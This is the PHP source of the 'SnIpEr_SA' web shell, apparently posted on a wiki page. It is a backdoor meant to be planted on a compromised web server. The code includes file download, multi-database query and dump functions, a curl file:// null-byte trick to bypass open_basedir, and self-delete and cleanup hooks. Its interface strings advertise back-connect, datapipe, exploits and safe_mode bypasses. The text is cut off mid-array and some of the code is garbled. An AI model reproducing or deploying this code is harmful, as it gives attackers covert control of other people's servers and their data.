Default language

If a preferred language is set in your browser then this will override the default site language.

<?php /******************************************************************************************************/ /* # ## ## # /* # # ## ### ## ## # # /* # ### ### # ### ## ### # /* # ## ######### ## # /* ########## /* ### ######### ### /* # ## ####### ## # /* ## ##### ## /* ## #### ## /* #### ## /* ###### /* ## ## ## /* @@ ## @@ /* @ @@@ #### @@@ @ /* @@@ ###### @@@ /* /* /* /* /* /* SnIpEr_SA.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ??????? /*  ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://3asfh.net/ /*  ??????: /*٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)*/ /*  ????????? ????????????? ?? ?????? ? ????:  ? ???? ?????? ??. /*  ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ?????? /*  ?? SnIpEr.SA@hotmail.com ??? ??????????? ????? ???????????. /*٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)٢٣:٥٢، ١٦ أكتوبر ٢٠٠٨ (CDT)*/ /* (c)oded by SnIpEr_SA /* MAIL http://rst.void.ru , http://ghc.ru /* ANY MODIFIED REPUBLISHING IS RESTRICTED /******************************************************************************************************/ /* Bomb f16 الخيارات | Options Bomb f16 */

// اللغة | Language // $language='ru' - ??????? (russian) // $language='eng' - english (??????????) $language='eng';

// ?????????????? | Authentification // $auth = 1; - لتفعيل الدخول بكلمه المرور ( authentification = On ) // $auth = 0; - لايقاف الدخول بكلمة المرور ( authentification = Off ) $auth = 0;

// لدخول بكلمة مرور واسم مستخدم (Login & Password for access) // لحماية السكربت من دخول غيرك غير التالي!!! (CHANGE THIS!!!) // هنا وضعك كلمه المرور وهي مشفره بصيغه md5, وكلمةع المرور هنا هي 'r57' // تستعطيع ان تشفر كلمة مرورك واسم المستخدم بصيغة md5 ووضعها في الخانات التاليه $name='ec371748dc2da624b35a4f8f685dd122'; // اسم المستخدم (user login) $pass='ec371748dc2da624b35a4f8f685dd122'; // كلمة المرور (user password) /******************************************************************************************************/ if(empty($_POST['SnIpEr_SA'])){

} else { $m=$_POST['SnIpEr_SA']; $ch = curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__); curl_exec($ch); var_dump(curl_exec($ch));

} echo "".htmlspecialchars($m).""; error_reporting(0); set_magic_quotes_runtime(0); @set_time_limit(0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); $safe_mode = @ini_get('safe_mode'); $version = '1.31'; if(version_compare(phpversion(), '4.1.0') == -1)

{
$_POST   = &$HTTP_POST_VARS;
$_GET    = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
$_COOKIE = &$HTTP_COOKIE_VARS;
}

if (@get_magic_quotes_gpc())

{
foreach ($_POST as $k=>$v)
 {
 $_POST[$k] = stripslashes($v);
 }
foreach ($_COOKIE as $k=>$v)
 {
 $_COOKIE[$k] = stripslashes($v);
 }
}

if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)

  {
  header('WWW-Authenticate: Basic realm="SnIpEr_SA"');
  header('HTTP/1.0 401 Unauthorized');
  exit("<a href=http://3asfh.net>SnIpEr_SA</a> : Access Denied");
  }

} $head = ' <html> <head> <meta http-equiv="Content-Language" content="ar-sa"> <meta name="GENERATOR" content="Microsoft FrontPage 6.0"> <meta name="ProgId" content="FrontPage.Editor.Document"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1256"> <title>SnIpEr_SA shell</title>

<STYLE> BODY {

       SCROLLBAR-FACE-COLOR: #800000; SCROLLBAR-HIGHLIGHT-COLOR: #101010; SCROLLBAR-SHADOW-COLOR: #101010; SCROLLBAR-3DLIGHT-COLOR: #101010; SCROLLBAR-ARROW-COLOR: #101010; SCROLLBAR-TRACK-COLOR: #101010; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #101010

}

tr { BORDER-RIGHT: #aaaaaa 2px solid; BORDER-TOP: #eeeeee 2px solid; BORDER-LEFT: #eeeeee 2px solid; BORDER-BOTTOM: #aaaaaa 2px solid; color: #ffffff; } td { BORDER-RIGHT: #aaaaaa 2px solid; BORDER-TOP: #eeeeee 2px solid; BORDER-LEFT: #eeeeee 2px solid; BORDER-BOTTOM: #aaaaaa 2px solid; color: #cccccc; } .table1 { BORDER: 1px; BACKGROUND-COLOR: #333333; color: #333333; } .td1 { BORDER: 1px; font: 7pt tahoma; color: #ffffff; } .tr1 { BORDER: 1px; color: #2279D9; } table { BORDER: #eeeeee 2px outset; BACKGROUND-COLOR: #272727; color: #2279D9; } input { BORDER-RIGHT: #ffffff 2px solid; BORDER-TOP: #999999 2px solid; BORDER-LEFT: #999999 2px solid; BORDER-BOTTOM: #ffffff 2px solid; BACKGROUND-COLOR: #800000; font: 9pt tahoma; color: #ffffff; } select { BORDER-RIGHT: #ffffff 2px solid; BORDER-TOP: #999999 2px solid; BORDER-LEFT: #999999 2px solid; BORDER-BOTTOM: #ffffff 2px solid; BACKGROUND-COLOR: #000000; font: 9pt tahoma; color: #CCCCCC;; } submit { BORDER: buttonhighlight 2px outset; BACKGROUND-COLOR: #272727; width: 40%; color: #2279D9; } textarea { BORDER-RIGHT: #ffffff 2px solid; BORDER-TOP: #999999 2px solid; BORDER-LEFT: #999999 2px solid; BORDER-BOTTOM: #ffffff 2px solid; BACKGROUND-COLOR: #3D3D3D; font: Fixedsys bold; color: #ffffff; } BODY { margin: 2px; color: #2279D9; background-color: #000000; } A:link {COLOR:red; TEXT-DECORATION: none} A:visited { COLOR:red; TEXT-DECORATION: none} A:active {COLOR:red; TEXT-DECORATION: none} A:hover {color:blue;TEXT-DECORATION: none} </STYLE> <script language=\'javascript\'> function hide_div(id) {

 document.getElementById(id).style.display = \'none\';
 document.cookie=id+\'=0;\';

} function show_div(id) {

 document.getElementById(id).style.display = \'block\';
 document.cookie=id+\'=1;\';

} function change_divst(id) {

 if (document.getElementById(id).style.display == \'none\')
   show_div(id);
 else
   hide_div(id);

} </script>'; class zipfile {

   var $datasec      = array();
   var $ctrl_dir     = array();
   var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
   var $old_offset   = 0;
   function unix2DosTime($unixtime = 0) {
       $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
       if ($timearray['year'] < 1980) {
           $timearray['year']    = 1980;
           $timearray['mon']     = 1;
           $timearray['mday']    = 1;
           $timearray['hours']   = 0;
           $timearray['minutes'] = 0;
           $timearray['seconds'] = 0;
       }
       return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
               ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
   }
   function addFile($data, $name, $time = 0)
   {
       $name     = str_replace('\\', '/', $name);
       $dtime    = dechex($this->unix2DosTime($time));
       $hexdtime = '\x' . $dtime[6] . $dtime[7]
                 . '\x' . $dtime[4] . $dtime[5]
                 . '\x' . $dtime[2] . $dtime[3]
                 . '\x' . $dtime[0] . $dtime[1];
       eval('$hexdtime = "' . $hexdtime . '";');
       $fr   = "\x50\x4b\x03\x04";
       $fr   .= "\x14\x00";
       $fr   .= "\x00\x00";
       $fr   .= "\x08\x00";
       $fr   .= $hexdtime;
       $unc_len = strlen($data);
       $crc     = crc32($data);
       $zdata   = gzcompress($data);
       $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
       $c_len   = strlen($zdata);
       $fr      .= pack('V', $crc);
       $fr      .= pack('V', $c_len);
       $fr      .= pack('V', $unc_len);
       $fr      .= pack('v', strlen($name));
       $fr      .= pack('v', 0);
       $fr      .= $name;
       $fr .= $zdata;
       $this -> datasec[] = $fr;
       $cdrec = "\x50\x4b\x01\x02";
       $cdrec .= "\x00\x00";
       $cdrec .= "\x14\x00";
       $cdrec .= "\x00\x00";
       $cdrec .= "\x08\x00";
       $cdrec .= $hexdtime;
       $cdrec .= pack('V', $crc);
       $cdrec .= pack('V', $c_len);
       $cdrec .= pack('V', $unc_len);
       $cdrec .= pack('v', strlen($name) );
       $cdrec .= pack('v', 0 );
       $cdrec .= pack('v', 0 );
       $cdrec .= pack('v', 0 );
       $cdrec .= pack('v', 0 );
       $cdrec .= pack('V', 32 );
       $cdrec .= pack('V', $this -> old_offset );
       $this -> old_offset += strlen($fr);
       $cdrec .= $name;
       $this -> ctrl_dir[] = $cdrec;
   }
   function file()
   {
       $data    = implode(, $this -> datasec);
       $ctrldir = implode(, $this -> ctrl_dir);
       return
           $data .
           $ctrldir .
           $this -> eof_ctrl_dir .
           pack('v', sizeof($this -> ctrl_dir)) .
           pack('v', sizeof($this -> ctrl_dir)) .
           pack('V', strlen($ctrldir)) .
           pack('V', strlen($data)) .
           "\x00\x00";
   }

} function compress(&$filename,&$filedump,$compress)

{
   global $content_encoding;
   global $mime_type;
   if ($compress == 'bzip' && @function_exists('bzcompress'))
    {
       $filename  .= '.bz2';
       $mime_type = 'application/x-bzip2';
       $filedump = bzcompress($filedump);
    }
    else if ($compress == 'gzip' && @function_exists('gzencode'))
    {
       $filename  .= '.gz';
       $content_encoding = 'x-gzip';
       $mime_type = 'application/x-gzip';
       $filedump = gzencode($filedump);
    }
    else if ($compress == 'zip' && @function_exists('gzcompress'))
    {
            $filename .= '.zip';
       $mime_type = 'application/zip';
       $zipfile = new zipfile();
       $zipfile -> addFile($filedump, substr($filename, 0, -4));
       $filedump = $zipfile -> file();
    }
    else
    {
            $mime_type = 'application/octet-stream';
    }
}

function mailattach($to,$from,$subj,$attach)

{
$headers  = "From: $from\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: ".$attach['type'];
$headers .= "; name=\"".$attach['name']."\"\r\n";
$headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
$headers .= chunk_split(base64_encode($attach['content']))."\r\n";
if(@mail($to,$subj,"",$headers)) { return 1; }
return 0;
}

class my_sql

{
var $host = 'localhost';
var $port = ;
var $user = ;
var $pass = ;
var $base = ;
var $db   = ;
var $connection;
var $res;
var $error;
var $rows;
var $columns;
var $num_rows;
var $num_fields;
var $dump;

function connect()
 {
         switch($this->db)
    {
          case 'MySQL':
           if(empty($this->port)) { $this->port = '3306'; }
           if(!function_exists('mysql_connect')) return 0;
           $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
           if(is_resource($this->connection)) return 1;
          break;
    case 'MSSQL':
     if(empty($this->port)) { $this->port = '1433'; }
           if(!function_exists('mssql_connect')) return 0;
           $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
     if($this->connection) return 1;
    break;
    case 'PostgreSQL':
     if(empty($this->port)) { $this->port = '5432'; }
     $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
     if(!function_exists('pg_connect')) return 0;
     $this->connection = @pg_connect($str);
     if(is_resource($this->connection)) return 1;
    break;
    case 'Oracle':
     if(!function_exists('ocilogon')) return 0;
     $this->connection = @ocilogon($this->user, $this->pass, $this->base);
     if(is_resource($this->connection)) return 1;
    break;
    }
   return 0;
 }

function select_db()
 {
  switch($this->db)
   {
         case 'MySQL':
          if(@mysql_select_db($this->base,$this->connection)) return 1;
   break;
   case 'MSSQL':
          if(@mssql_select_db($this->base,$this->connection)) return 1;
   break;
   case 'PostgreSQL':
    return 1;
   break;
   case 'Oracle':
    return 1;
   break;
   }
  return 0;
 }

function query($query)
 {
  $this->res=$this->error=;
  switch($this->db)
   {
         case 'MySQL':
    if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
     {
     $this->error = @mysql_error($this->connection);
     return 0;
     }
    else if(is_resource($this->res)) { return 1; }
    return 2;
         break;
   case 'MSSQL':
    if(false===($this->res=@mssql_query($query,$this->connection)))
     {
     $this->error = 'Query error';
     return 0;
     }
     else if(@mssql_num_rows($this->res) > 0) { return 1; }
    return 2;
   break;
   case 'PostgreSQL':
    if(false===($this->res=@pg_query($this->connection,$query)))
     {
     $this->error = @pg_last_error($this->connection);
     return 0;
     }
     else if(@pg_num_rows($this->res) > 0) { return 1; }
    return 2;
   break;
   case 'Oracle':
    if(false===($this->res=@ociparse($this->connection,$query)))
     {
     $this->error = 'Query parse error';
     }
    else
     {
     if(@ociexecute($this->res))
      {
      if(@ocirowcount($this->res) != 0) return 2;
      return 1;
      }
     $error = @ocierror();
     $this->error=$error['message'];
     }
   break;
   }
 return 0;
 }
function get_result()
 {
  $this->rows=array();
  $this->columns=array();
  $this->num_rows=$this->num_fields=0;
  switch($this->db)
   {
         case 'MySQL':
          $this->num_rows=@mysql_num_rows($this->res);
          $this->num_fields=@mysql_num_fields($this->res);
          while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
          @mysql_free_result($this->res);
          if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
   break;
   case 'MSSQL':
          $this->num_rows=@mssql_num_rows($this->res);
          $this->num_fields=@mssql_num_fields($this->res);
          while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
          @mssql_free_result($this->res);
          if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
   break;
   case 'PostgreSQL':
          $this->num_rows=@pg_num_rows($this->res);
          $this->num_fields=@pg_num_fields($this->res);
          while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
          @pg_free_result($this->res);
          if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
   break;
   case 'Oracle':
    $this->num_fields=@ocinumcols($this->res);
    while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
    @ocifreestatement($this->res);
    if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
   break;
   }
  return 0;
 }
function dump($table)
 {
  if(empty($table)) return 0;
  $this->dump=array();
  $this->dump[0] = '##';
  $this->dump[1] = '## --------------------------------------- ';
  $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
  $this->dump[3] = '## Database: '.$this->base;
  $this->dump[4] = '##    Table: '.$table;
  $this->dump[5] = '## --------------------------------------- ';
  switch($this->db)
   {
         case 'MySQL':
          $this->dump[0] = '## MySQL dump';
          if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
          if(!$this->get_result()) return 0;
          $this->dump[] = $this->rows[0]['Create Table'];
    $this->dump[] = '## --------------------------------------- ';
          if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
          if(!$this->get_result()) return 0;
          for($i=0;$i<$this->num_rows;$i++)
           {
     foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
           $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\.@implode("', '", $this->rows[$i]).'\');';
           }
   break;
   case 'MSSQL':
    $this->dump[0] = '## MSSQL dump';
    if($this->query('SELECT * FROM '.$table)!=1) return 0;
          if(!$this->get_result()) return 0;
          for($i=0;$i<$this->num_rows;$i++)
           {
     foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
           $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\.@implode("', '", $this->rows[$i]).'\');';
           }
   break;
   case 'PostgreSQL':
    $this->dump[0] = '## PostgreSQL dump';
    if($this->query('SELECT * FROM '.$table)!=1) return 0;
          if(!$this->get_result()) return 0;
          for($i=0;$i<$this->num_rows;$i++)
           {
     foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
           $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\.@implode("', '", $this->rows[$i]).'\');';
           }
   break;
   case 'Oracle':
     $this->dump[0] = '## ORACLE dump';
     $this->dump[]  = '## under construction';
   break;
   default:
    return 0;
   break;
   }
  return 1;
 }
function close()
 {
  switch($this->db)
   {
         case 'MySQL':
          @mysql_close($this->connection);
   break;
   case 'MSSQL':
    @mssql_close($this->connection);
   break;
   case 'PostgreSQL':
    @pg_close($this->connection);
   break;
   case 'Oracle':
    @oci_close($this->connection);
   break;
   }
 }
function affected_rows()
 {
  switch($this->db)
   {
         case 'MySQL':
          return @mysql_affected_rows($this->res);
   break;
   case 'MSSQL':
    return @mssql_affected_rows($this->res);
   break;
   case 'PostgreSQL':
    return @pg_affected_rows($this->res);
   break;
   case 'Oracle':
    return @ocirowcount($this->res);
   break;
   default:
    return 0;
   break;
   }
 }
}

if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))

{
 if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
 else
  {
   @ob_clean();
   $filename = @basename($_POST['d_name']);
   $filedump = @fread($file,@filesize($_POST['d_name']));
   fclose($file);
   $content_encoding=$mime_type=;
   compress($filename,$filedump,$_POST['compress']);
   if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
   header("Content-type: ".$mime_type);
   header("Content-disposition: attachment; filename=\"".$filename."\";");
   echo $filedump;
   exit();
  }
}

if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "

"; die(); }

if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")

{
echo $head;
$sql = new my_sql();
$sql->db   = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
$querys = @explode(';',$_POST['db_query']);
echo '<body bgcolor=#000000>';

if(!$sql->connect()) echo "

";

 else
  {

if(!empty($sql->base)&&!$sql->select_db()) echo "

";

  else
   {
   foreach($querys as $num=>$query)
    {
     if(strlen($query)>5)
     {
     echo "Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."
";
     switch($sql->query($query))
      {
      case '0':

echo "

";

      break;
      case '1':
      if($sql->get_result())
       {

echo "

       for($i=0;$i<$sql->num_rows;$i++)
        {
        foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);

        }

";

       }
      break;
      case '2':
      $ar = $sql->affected_rows()?($sql->affected_rows()):('0');

echo "

";

      break;
      }
     }
    }
   }
  }
echo "
<form name=form method=POST>";
echo in('hidden','db',0,$_POST['db']);
echo in('hidden','db_server',0,$_POST['db_server']);
echo in('hidden','db_port',0,$_POST['db_port']);
echo in('hidden','mysql_l',0,$_POST['mysql_l']);
echo in('hidden','mysql_p',0,$_POST['mysql_p']);
echo in('hidden','mysql_db',0,$_POST['mysql_db']);
echo in('hidden','cmd',0,'db_query');

echo "

echo "Base: <input type=text name=mysql_db value=\"".$sql->base."\">
";

";

echo "</form>";

echo "

"; die();

}

if(isset($_GET['delete']))

{
  @unlink(__FILE__);
}

if(isset($_GET['tmp']))

{
  @unlink("/tmp/bdpl");
  @unlink("/tmp/back");
  @unlink("/tmp/bd");
  @unlink("/tmp/bd.c");
  @unlink("/tmp/dp");
  @unlink("/tmp/dpc");
  @unlink("/tmp/dpc.c");
}

if(isset($_GET['phpini'])) { echo $head; function U_value($value)

{
if ($value == ) return 'no value';
if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
if ($value === null) return 'NULL';
if (@is_object($value)) $value = (array) $value;
if (@is_array($value))
{
@ob_start();
print_r($value);
$value = @ob_get_contents();
@ob_end_clean();
}
return U_wordwrap((string) $value);
}

function U_wordwrap($str)

{
$str = @wordwrap(@htmlspecialchars($str), 100, '', true);
return @preg_replace('!(&[^;]*)([^;]*;)!', '$1$2', $str);
}

if (@function_exists('ini_get_all'))

{
$r = ;

echo '

foreach (@ini_get_all() as $key=>$value)
 {

 }
echo $r;

';

}

echo "

";

die(); } if(isset($_GET['cpu']))

{
  echo $head;

echo '

  $cpuf = @file("cpuinfo");
  if($cpuf)
   {
     $c = @sizeof($cpuf);
     for($i=0;$i<$c;$i++)
       {
         $info = @explode(":",$cpuf[$i]);
         if($info[1]==""){ $info[1]="---"; }

       }
     echo $r;
   }
  else
   {

   }

'; echo "

";

  die();
}

if(isset($_GET['mem']))

{
  echo $head;

echo '

  $memf = @file("meminfo");
  if($memf)
   {
     $c = sizeof($memf);
     for($i=0;$i<$c;$i++)
       {
         $info = explode(":",$memf[$i]);
         if($info[1]==""){ $info[1]="---"; }

       }
     echo $r;
   }
  else
   {

   }

'; echo "

";

  die();
}

$lang=array( 'ru_text1' =>'??????????? ???????', 'ru_text2' =>'?????????? ?????? ?? ???????', 'ru_text3' =>'????????? ???????', 'ru_text4' =>'??????? ??????????', 'ru_text5' =>'???????? ?????? ?? ??????', 'ru_text6' =>'????????? ????', 'ru_text7' =>'??????', 'ru_text8' =>'???????? ?????', 'ru_butt1' =>'?????????', 'ru_butt2' =>'?????????', 'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', 'ru_text10'=>'??????? ????', 'ru_text11'=>'?????? ??? ???????', 'ru_butt3' =>'???????', 'ru_text12'=>'back-connect', 'ru_text13'=>'IP-?????', 'ru_text14'=>'????', 'ru_butt4' =>'?????????', 'ru_text15'=>'???????? ?????? ? ?????????? ???????', 'ru_text16'=>'????????????', 'ru_text17'=>'????????? ????', 'ru_text18'=>'????????? ????', 'ru_text19'=>'Exploits', 'ru_text20'=>'????????????', 'ru_text21'=>'????? ???', 'ru_text22'=>'datapipe', 'ru_text23'=>'????????? ????', 'ru_text24'=>'????????? ????', 'ru_text25'=>'????????? ????', 'ru_text26'=>'????????????', 'ru_butt5' =>'?????????', 'ru_text28'=>'?????? ? safe_mode', 'ru_text29'=>'?????? ????????', 'ru_butt6' =>'???????', 'ru_text30'=>'???????? ?????', 'ru_butt7' =>'???????', 'ru_text31'=>'???? ?? ??????', 'ru_text32'=>'?????????? PHP ????', 'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL', 'ru_butt8' =>'?????????', 'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', 'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', 'ru_text36'=>'???? . ???????', 'ru_text37'=>'?????', 'ru_text38'=>'??????', 'ru_text39'=>'????', 'ru_text40'=>'???? ??????? ???? ??????', 'ru_butt9' =>'????', 'ru_text41'=>'????????? ? ?????', 'ru_text42'=>'?????????????? ?????', 'ru_text43'=>'????????????? ????', 'ru_butt10'=>'?????????', 'ru_butt11'=>'?????????????', 'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', 'ru_text45'=>'???? ????????', 'ru_text46'=>'???????? phpinfo()', 'ru_text47'=>'???????? ???????? php.ini', 'ru_text48'=>'???????? ????????? ??????', 'ru_text49'=>'???????? ??????? ? ???????', 'ru_text50'=>'?????????? ? ??????????', 'ru_text51'=>'?????????? ? ??????', 'ru_text52'=>'????? ??? ??????', 'ru_text53'=>'?????? ? ?????', 'ru_text54'=>'????? ?????? ? ??????', 'ru_butt12'=>'?????', 'ru_text55'=>'?????? ? ??????', 'ru_text56'=>'?????? ?? ???????', 'ru_text57'=>'???????/??????? ????/??????????', 'ru_text58'=>'???', 'ru_text59'=>'????', 'ru_text60'=>'??????????', 'ru_butt13'=>'???????/???????', 'ru_text61'=>'???? ??????', 'ru_text62'=>'?????????? ???????', 'ru_text63'=>'???? ??????', 'ru_text64'=>'?????????? ???????', 'ru_text65'=>'???????', 'ru_text66'=>'???????', 'ru_text67'=>'Chown/Chgrp/Chmod', 'ru_text68'=>'???????', 'ru_text69'=>'????????1', 'ru_text70'=>'????????2', 'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)", 'ru_text72'=>'????? ??? ??????', 'ru_text73'=>'?????? ? ?????', 'ru_text74'=>'?????? ? ??????', 'ru_text75'=>'* ????? ???????????? ?????????? ?????????', 'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', 'ru_text80'=>'???', 'ru_text81'=>'????', 'ru_text82'=>'???? ??????', 'ru_text83'=>'?????????? SQL ???????', 'ru_text84'=>'SQL ??????', 'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????', 'ru_text86'=>'?????????? ????? ? ???????', 'ru_butt14'=>'???????', 'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????', 'ru_text88'=>'FTP-??????:????', 'ru_text89'=>'???? ?? ftp ???????', 'ru_text90'=>'????? ????????', 'ru_text91'=>'???????????? ?', 'ru_text92'=>'??? ?????????', 'ru_text93'=>'FTP', 'ru_text94'=>'FTP-????????', 'ru_text95'=>'?????? ?????????????', 'ru_text96'=>'?? ??????? ???????? ?????? ?????????????', 'ru_text97'=>'????????? ??????????: ', 'ru_text98'=>'??????? ???????????: ', 'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd', 'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????', 'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????', 'ru_text102'=>'?????', 'ru_text103'=>'???????? ??????', 'ru_text104'=>'???????? ????? ?? ???????? ????', 'ru_text105'=>'????', 'ru_text106'=>'??', 'ru_text107'=>'????', 'ru_butt15'=>'?????????', 'ru_text108'=>'????? ??????', 'ru_text109'=>'????????', 'ru_text110'=>'??????????', 'ru_text111'=>'SQL-?????? : ????', 'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail', 'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list', 'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body', 'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ? copy()', 'ru_text116'=>'?????????? ????', 'ru_text117'=>'?', 'ru_text118'=>'???? ??????????', 'ru_text119'=>'?? ??????? ??????????? ????', 'ru_err0'=>'??????! ?? ???? ???????? ? ???? ', 'ru_err1'=>'??????! ?? ???? ????????? ???? ', 'ru_err2'=>'??????! ?? ??????? ??????? ', 'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????', 'ru_err4'=>'?????? ??????????? ?? ftp ???????', 'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????', 'ru_err6'=>'??????! ?? ??????? ????????? ??????', 'ru_err7'=>'?????? ??????????', /* --------------------------------------------------------------- */ 'eng_text1' =>'الامر المنفذ', 'eng_text2' =>'تنفيذ الاوامر في السيرفر', 'eng_text3' =>'امر التشغيل', 'eng_text4' =>'مكان عملك الان على السيرفر', 'eng_text5' =>'رفع ملف الى السيرفر', 